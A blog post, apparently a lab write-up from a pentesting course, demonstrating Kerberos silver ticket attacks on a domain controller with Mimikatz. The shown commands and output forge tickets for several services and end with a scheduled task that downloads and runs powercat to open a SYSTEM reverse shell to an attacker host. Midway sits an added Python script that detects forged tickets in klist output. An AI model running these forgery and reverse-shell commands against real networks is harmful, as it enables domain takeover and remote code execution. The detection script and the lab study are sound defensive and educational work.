I originally wrote this post when I started the Pentester Academy courses. Having noticed that I made some mistakes, I decided to write it again. In this post we will carry out a silver ticket attack under a specific set of conditions.
The prerequisites are these: we have already escalated to local administrator on the machine we are connected to, and we hold the NTLM hash of the target service account. That hash can be obtained beforehand with attacks such as Kerberoasting.
Different silver ticket attacks are possible depending on the service. Examples of some service types are listed below.
Service Type: WMI
Service Silver Tickets: HOST, RPCSS
Service Type: PowerShell Remoting
Service Silver Tickets: HOST, HTTP, WSMAN, RPCSS
Service Type: WinRM
Service Silver Tickets: HOST, HTTP
Service Type: Scheduled Tasks
Service Silver Tickets: HOST
Service Type: Windows File Share (CIFS)
Service Silver Tickets: CIFS
Service Type: LDAP operations including Mimikatz DCSync
Service Silver Tickets: LDAP
Service Type: Windows Remote Server Administration Tools
Service Silver Tickets: RPCSS, LDAP, CIFS
If you have studied the list above, the short version is this: if you want to use PowerShell remoting against the DC after a silver ticket attack, the service you need is HTTP. Since the account behind the HTTP service is the machine itself, the NTLM hash you use must be the machine account's NTLM hash. The target server may instead be running MSSQL Server; in that case you need the NTLM hash of the MSSQL service account. Below are examples of silver ticket attacks tried against different services.
Silver Ticket for Windows Share (CIFS) Admin Access
As shown below, a first attempt was made before the attack and it failed with an error.
PS C:\Tools\MimikatzPowershell> ls \\DC-01.kuday.local\C$
ls : Access is denied
At line:1 char:1
+ ls \\DC-01.kuday.local\C$
+ ~~~~~~~~~~~~~~~~~~~~~~~~~
+ CategoryInfo : PermissionDenied: (\\DC-01.kuday.local\C$:String) [Get-ChildItem], UnauthorizedAccessException
+ FullyQualifiedErrorId : ItemExistsUnauthorizedAccessError,Microsoft.PowerShell.Commands.GetChildItemCommand
ls : Cannot find path '\\DC-01.kuday.local\C$' because it does not exist.
At line:1 char:1
+ ls \\DC-01.kuday.local\C$
+ ~~~~~~~~~~~~~~~~~~~~~~~~~
+ CategoryInfo : ObjectNotFound: (\\DC-01.kuday.local\C$:String) [Get-ChildItem], ItemNotFoundException
+ FullyQualifiedErrorId : PathNotFound,Microsoft.PowerShell.Commands.GetChildItemCommand
PS C:\Tools\MimikatzPowershell>
Let's carry out the attack with Mimikatz.
Note: we already know the domain SID (Get-DomainSID from PowerSploit/Recon) and the NTLM hash of the DC-01 machine account.
PS C:\Tools\MimikatzPowershell> Invoke-Mimikatz -Command '"kerberos::golden /sid:S-1-5-21-2945184338-1184837640-344998139 /domain:kuday.local /user:Administrator /service:cifs /rc4:35df48bccf39f0ff7e97a928b1d2dc2c /target:DC-01.kuday.local /ptt"'
.#####. mimikatz 2.2.0 (x64) #18362 Oct 30 2019 13:01:25
.## ^ ##. "A La Vie, A L'Amour" - (oe.eo)
## / \ ## /*** Benjamin DELPY `gentilkiwi` ( [email protected] )
## \ / ## > http://blog.gentilkiwi.com/mimikatz
'## v ##' Vincent LE TOUX ( [email protected] )
'#####' > http://pingcastle.com / http://mysmartlogon.com ***/
mimikatz(powershell) # kerberos::golden /sid:S-1-5-21-2945184338-1184837640-344998139 /domain:kuday.local /user:Administrator /service:cifs /rc4:35df48bccf39f0ff7e97a928b1d2dc2c /target:DC-01.kuday.local /ptt
User : Administrator
Domain : kuday.local (KUDAY)
SID : S-1-5-21-2945184338-1184837640-344998139
User Id : 500
Groups Id : *513 512 520 518 519
ServiceKey: 35df48bccf39f0ff7e97a928b1d2dc2c - rc4_hmac_nt
Service : cifs
Target : DC-01.kuday.local
Lifetime : 11/29/2020 2:35:26 AM ; 11/27/2030 2:35:26 AM ; 11/27/2030 2:35:26 AM
-> Ticket : ** Pass The Ticket **
* PAC generated
* PAC signed
* EncTicketPart generated
* EncTicketPart encrypted
* KrbCred generated
Golden ticket for 'Administrator @ kuday.local' successfully submitted for current session
PS C:\Tools\MimikatzPowershell>
PS C:\Tools\MimikatzPowershell> ls \\DC-01.kuday.local\C$
Directory: \\DC-01.kuday.local\C$
Mode LastWriteTime Length Name
---- ------------- ------ ----
d----- 8/7/2020 6:58 AM PerfLogs
d-r--- 11/10/2020 12:09 AM Program Files
d----- 11/9/2020 12:40 AM Program Files (x86)
d----- 10/29/2020 2:31 AM SQL2019
d-r--- 10/29/2020 5:37 PM Users
d----- 10/6/2020 9:28 PM Windows
-a---- 10/29/2020 5:17 PM 23 Sonuclar.txt
-a---- 11/22/2020 12:29 AM 1391 ticket.kirbi
PS C:\Tools\MimikatzPowershell>
As you can see, the attack was successful!
Silver Ticket to Connect to PowerShell Remoting on Windows Computer with Admin Access
First, let's make an attempt.
PS C:\Windows\system32> Enter-PSSession -ComputerName DC-01.kuday.local
Enter-PSSession : Connecting to remote server DC-01.kuday.local failed with the following error message : A specified
logon session does not exist. It may already have been terminated. For more information, see the
about_Remote_Troubleshooting Help topic.
At line:1 char:1
+ Enter-PSSession -ComputerName DC-01.kuday.local
+ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+ CategoryInfo : InvalidArgument: (DC-01.kuday.local:String) [Enter-PSSession], PSRemotingTransportException
+ FullyQualifiedErrorId : CreateRemoteRunspaceFailed
As shown above, we could not complete the operation. Now let's perform the silver ticket attack for PowerShell Remoting using the HTTP and WSMAN (WinRM) services.
PS C:\Tools\MimikatzPowershell> Invoke-Mimikatz -Command '"kerberos::golden /sid:S-1-5-21-2945184338-1184837640-344998139 /domain:kuday.local /user:Administrator /service:http /rc4:35df48bccf39f0ff7e97a928b1d2dc2c /target:DC-01.kuday.local /ptt"'
.#####. mimikatz 2.2.0 (x64) #18362 Oct 30 2019 13:01:25
.## ^ ##. "A La Vie, A L'Amour" - (oe.eo)
## / \ ## /*** Benjamin DELPY `gentilkiwi` ( [email protected] )
## \ / ## > http://blog.gentilkiwi.com/mimikatz
'## v ##' Vincent LE TOUX ( [email protected] )
'#####' > http://pingcastle.com / http://mysmartlogon.com ***/
mimikatz(powershell) # kerberos::golden /sid:S-1-5-21-2945184338-1184837640-344998139 /domain:kuday.local /user:Administrator /service:http /rc4:35df48bccf39f0ff7e97a928b1d2dc2c /target:DC-01.kuday.local /ptt
User : Administrator
Domain : kuday.local (KUDAY)
SID : S-1-5-21-2945184338-1184837640-344998139
User Id : 500
Groups Id : *513 512 520 518 519
ServiceKey: 35df48bccf39f0ff7e97a928b1d2dc2c - rc4_hmac_nt
Service : http
Target : DC-01.kuday.local
Lifetime : 11/29/2020 2:39:46 AM ; 11/27/2030 2:39:46 AM ; 11/27/2030 2:39:46 AM
-> Ticket : ** Pass The Ticket **
* PAC generated
* PAC signed
* EncTicketPart generated
* EncTicketPart encrypted
* KrbCred generated
Golden ticket for 'Administrator @ kuday.local' successfully submitted for current session
PS C:\Tools\MimikatzPowershell>
PS C:\Tools\MimikatzPowershell> Invoke-Mimikatz -Command '"kerberos::golden /sid:S-1-5-21-2945184338-1184837640-344998139 /domain:kuday.local /user:Administrator /service:wsman /rc4:35df48bccf39f0ff7e97a928b1d2dc2c /target:DC-01.kuday.local /ptt"'
.#####. mimikatz 2.2.0 (x64) #18362 Oct 30 2019 13:01:25
.## ^ ##. "A La Vie, A L'Amour" - (oe.eo)
## / \ ## /*** Benjamin DELPY `gentilkiwi` ( [email protected] )
## \ / ## > http://blog.gentilkiwi.com/mimikatz
'## v ##' Vincent LE TOUX ( [email protected] )
'#####' > http://pingcastle.com / http://mysmartlogon.com ***/
mimikatz(powershell) # kerberos::golden /sid:S-1-5-21-2945184338-1184837640-344998139 /domain:kuday.local /user:Administrator /service:wsman /rc4:35df48bccf39f0ff7e97a928b1d2dc2c /target:DC-01.kuday.local /ptt
User : Administrator
Domain : kuday.local (KUDAY)
SID : S-1-5-21-2945184338-1184837640-344998139
User Id : 500
Groups Id : *513 512 520 518 519
ServiceKey: 35df48bccf39f0ff7e97a928b1d2dc2c - rc4_hmac_nt
Service : wsman
Target : DC-01.kuday.local
Lifetime : 11/29/2020 2:40:17 AM ; 11/27/2030 2:40:17 AM ; 11/27/2030 2:40:17 AM
-> Ticket : ** Pass The Ticket **
* PAC generated
* PAC signed
* EncTicketPart generated
* EncTicketPart encrypted
* KrbCred generated
Golden ticket for 'Administrator @ kuday.local' successfully submitted for current session
PS C:\Tools\MimikatzPowershell>
Let's check our ticket cache.
PS C:\Tools\MimikatzPowershell> klist
Current LogonId is 0:0x36705
Cached Tickets: (2)
#0> Client: Administrator @ kuday.local
Server: wsman/DC-01.kuday.local @ kuday.local
KerbTicket Encryption Type: RSADSI RC4-HMAC(NT)
Ticket Flags 0x40a00000 -> forwardable renewable pre_authent
Start Time: 11/29/2020 2:40:17 (local)
End Time: 11/27/2030 2:40:17 (local)
Renew Time: 11/27/2030 2:40:17 (local)
Session Key Type: RSADSI RC4-HMAC(NT)
Cache Flags: 0
Kdc Called:
#1> Client: Administrator @ kuday.local
Server: http/DC-01.kuday.local @ kuday.local
KerbTicket Encryption Type: RSADSI RC4-HMAC(NT)
Ticket Flags 0x40a00000 -> forwardable renewable pre_authent
Start Time: 11/29/2020 2:39:46 (local)
End Time: 11/27/2030 2:39:46 (local)
Renew Time: 11/27/2030 2:39:46 (local)
Session Key Type: RSADSI RC4-HMAC(NT)
Cache Flags: 0
Kdc Called:
PS C:\Tools\MimikatzPowershell>
Great! Now we can connect.
PS C:\Tools\MimikatzPowershell> Enter-PSSession -ComputerName DC-01.KUDAY.LOCAL
[DC-01.KUDAY.LOCAL]: PS C:\Users\Administrator\Documents> hostname
DC-01
[DC-01.KUDAY.LOCAL]: PS C:\Users\Administrator\Documents>
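From the defender's side, the klist listing above already carries the tells of a forged service ticket: a ten-year lifetime that no KDC would ever issue, RC4-HMAC encryption (the ticket was built straight from an NTLM hash) and an empty "Kdc Called" field, because the ticket was injected with /ptt instead of being requested. The following Python script is an added example, not part of the original post: it parses klist output in that shape and reports the tickets that trip those checks. The 10-hour policy maximum and the sample listing are assumptions constructed for the example.

```python
import re
from datetime import datetime, timedelta

MAX_LIFETIME = timedelta(hours=10)  # assumed policy: Windows' default "Maximum lifetime for service ticket" is 600 minutes

# Constructed sample shaped like the post's klist output: the forged wsman ticket beside a legitimate TGT.
SAMPLE_KLIST = """#0> Client: Administrator @ kuday.local
Server: wsman/DC-01.kuday.local @ kuday.local
KerbTicket Encryption Type: RSADSI RC4-HMAC(NT)
Start Time: 11/29/2020 2:40:17 (local)
End Time: 11/27/2030 2:40:17 (local)
Kdc Called:
#1> Client: Administrator @ kuday.local
Server: krbtgt/kuday.local @ kuday.local
KerbTicket Encryption Type: AES-256-CTS-HMAC-SHA1-96
Start Time: 11/29/2020 2:30:00 (local)
End Time: 11/29/2020 12:30:00 (local)
Kdc Called: DC-01.kuday.local
"""

def parse_klist(text):
    tickets, cur = [], None  # one dict per "#n> Client:" block, keyed by the field names klist prints
    for line in text.splitlines():
        m = re.match(r"#\d+>\s*Client:\s*(.+)", line.strip())
        if m:
            cur = {"Client": m.group(1).strip()}
            tickets.append(cur)
        elif cur is not None and ":" in line:
            key, _, val = line.partition(":")
            cur[key.strip()] = val.strip()
    return tickets

def _when(field):
    return datetime.strptime(field.replace("(local)", "").strip(), "%m/%d/%Y %H:%M:%S")

def assess(ticket, max_lifetime=MAX_LIFETIME):
    reasons = []  # why this cached ticket looks forged; an empty list means nothing stood out
    lifetime = _when(ticket["End Time"]) - _when(ticket["Start Time"])
    if lifetime > max_lifetime:  # a KDC never issues past policy; mimikatz defaults to 10 years
        reasons.append("lifetime %s exceeds policy maximum %s" % (lifetime, max_lifetime))
    if "RC4" in ticket.get("KerbTicket Encryption Type", ""):  # forged from an NTLM hash, or legacy crypto
        reasons.append("ticket encrypted with RC4-HMAC")
    if not ticket.get("Kdc Called"):  # injected into the cache (pass-the-ticket), no KDC exchange
        reasons.append("no KDC was contacted for this ticket")
    return reasons

def suspicious_tickets(text, max_lifetime=MAX_LIFETIME):
    # (server SPN, reasons) for every cached ticket that trips at least one check
    return [(t["Server"], r) for t in parse_klist(text) if (r := assess(t, max_lifetime))]
```

Run it over the output of `klist` collected from a suspect host; a single legitimate hit (an RC4 ticket in a legacy domain, for instance) is worth a look, while all three reasons on one ticket is the pattern the walkthrough above produces.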
Silver Ticket for the Windows computer (HOST) with Admin Access
In this last example we will create a scheduled task and try to get a reverse shell through it. This one takes a bit longer than the others, but I think it is more fun. Grab a coffee!
Since we will be catching a reverse shell, we also need a listener. I will use powercat for that. The GitHub link is here.
First, I started a listener on my own machine.
PS C:\Tools\powercat> Import-Module .\powercat.ps1
PS C:\Tools\powercat> powercat -l -p 443
Then I performed a silver ticket attack using the HOST service.
PS C:\Tools\MimikatzPowershell> Invoke-Mimikatz -Command '"kerberos::golden /sid:S-1-5-21-2945184338-1184837640-344998139 /domain:kuday.local /user:Administrator /service:HOST /rc4:35df48bccf39f0ff7e97a928b1d2dc2c /target:DC-01.kuday.local /ptt"'
.#####. mimikatz 2.2.0 (x64) #18362 Oct 30 2019 13:01:25
.## ^ ##. "A La Vie, A L'Amour" - (oe.eo)
## / \ ## /*** Benjamin DELPY `gentilkiwi` ( [email protected] )
## \ / ## > http://blog.gentilkiwi.com/mimikatz
'## v ##' Vincent LE TOUX ( [email protected] )
'#####' > http://pingcastle.com / http://mysmartlogon.com ***/
mimikatz(powershell) # kerberos::golden /sid:S-1-5-21-2945184338-1184837640-344998139 /domain:kuday.local /user:Administrator /service:HOST /rc4:35df48bccf39f0ff7e97a928b1d2dc2c /target:DC-01.kuday.local /ptt
User : Administrator
Domain : kuday.local (KUDAY)
SID : S-1-5-21-2945184338-1184837640-344998139
User Id : 500
Groups Id : *513 512 520 518 519
ServiceKey: 35df48bccf39f0ff7e97a928b1d2dc2c - rc4_hmac_nt
Service : HOST
Target : DC-01.kuday.local
Lifetime : 11/29/2020 3:12:15 AM ; 11/27/2030 3:12:15 AM ; 11/27/2030 3:12:15 AM
-> Ticket : ** Pass The Ticket **
* PAC generated
* PAC signed
* EncTicketPart generated
* EncTicketPart encrypted
* KrbCred generated
Golden ticket for 'Administrator @ kuday.local' successfully submitted for current session
PS C:\Tools\MimikatzPowershell>
Now let's look at the scheduled tasks on DC-01.
PS C:\Tools\MimikatzPowershell> Get-ScheduledTask -CimSession DC-01.kuday.local
TaskPath TaskName State PSComputerName
-------- -------- ----- --------------
\ CreateExplorerShellUnelevatedTask Ready DC-01.kuday.local
\ STCheck Ready DC-01.kuday.local
\ User_Feed_Synchronization-{EF7... Ready DC-01.kuday.local
\Microsoft\Windows\ Server Initial Configuration Task Disabled DC-01.kuday.local
\Microsoft\Windows\.NET Framework\ .NET Framework NGEN v4.0.30319 Ready DC-01.kuday.local
\Microsoft\Windows\.NET Framework\ .NET Framework NGEN v4.0.30319 64 Ready DC-01.kuday.local
\Microsoft\Windows\.NET Framework\ .NET Framework NGEN v4.0.30319... Disabled DC-01.kuday.local
\Microsoft\Windows\.NET Framework\ .NET Framework NGEN v4.0.30319... Disabled DC-01.kuday.local
\Microsoft\Windows\Active Directory Rights ... AD RMS Rights Policy Template ... Disabled DC-01.kuday.local
\Microsoft\Windows\Active Directory Rights ... AD RMS Rights Policy Template ... Ready DC-01.kuday.local
\Microsoft\Windows\AppID\ EDP Policy Manager Ready DC-01.kuday.local
\Microsoft\Windows\AppID\ PolicyConverter Disabled DC-01.kuday.local
\Microsoft\Windows\AppID\ VerifiedPublisherCertStoreCheck Disabled DC-01.kuday.local
\Microsoft\Windows\Application Experience\ Microsoft Compatibility Appraiser Ready DC-01.kuday.local
\Microsoft\Windows\Application Experience\ ProgramDataUpdater Ready DC-01.kuday.local
...
...
...
Under normal circumstances we could not have run this command. Thanks to the silver ticket attack, we get no error when we point the CimSession at DC-01.kuday.local. Now let's prepare our scheduled task.
PS C:\Tools\MimikatzPowershell> schtasks.exe /create /S DC-01.kuday.local /SC Weekly /RU "NT Authority\SYSTEM" /TN "KUDAY4REVERSE" /TR "powershell.exe -c 'iex (New-Object Net.WebClient).DownloadString('''https://raw.githubusercontent.com/kudayDOTsite/powercat/master/powercat.ps1'''); powercat -c 10.10.250.111 443 -e cmd;'"
SUCCESS: The scheduled task "KUDAY4REVERSE" has successfully been created.
PS C:\Tools\MimikatzPowershell>
PS C:\Tools\MimikatzPowershell> schtasks.exe /Run /S DC-01.kuday.local /TN "KUDAY4REVERSE"
SUCCESS: Attempted to run the scheduled task "KUDAY4REVERSE".
PS C:\Tools\MimikatzPowershell>
When we check our listener:
PS C:\Tools\powercat> powercat -l -p 443 -t 99999
Microsoft Windows [Version 10.0.17763.1397]
(c) 2018 Microsoft Corporation. All rights reserved.
C:\Windows\system32>hostname
hostname
DC-01
C:\Windows\system32>whoami
whoami
nt authority\system
C:\Windows\system32>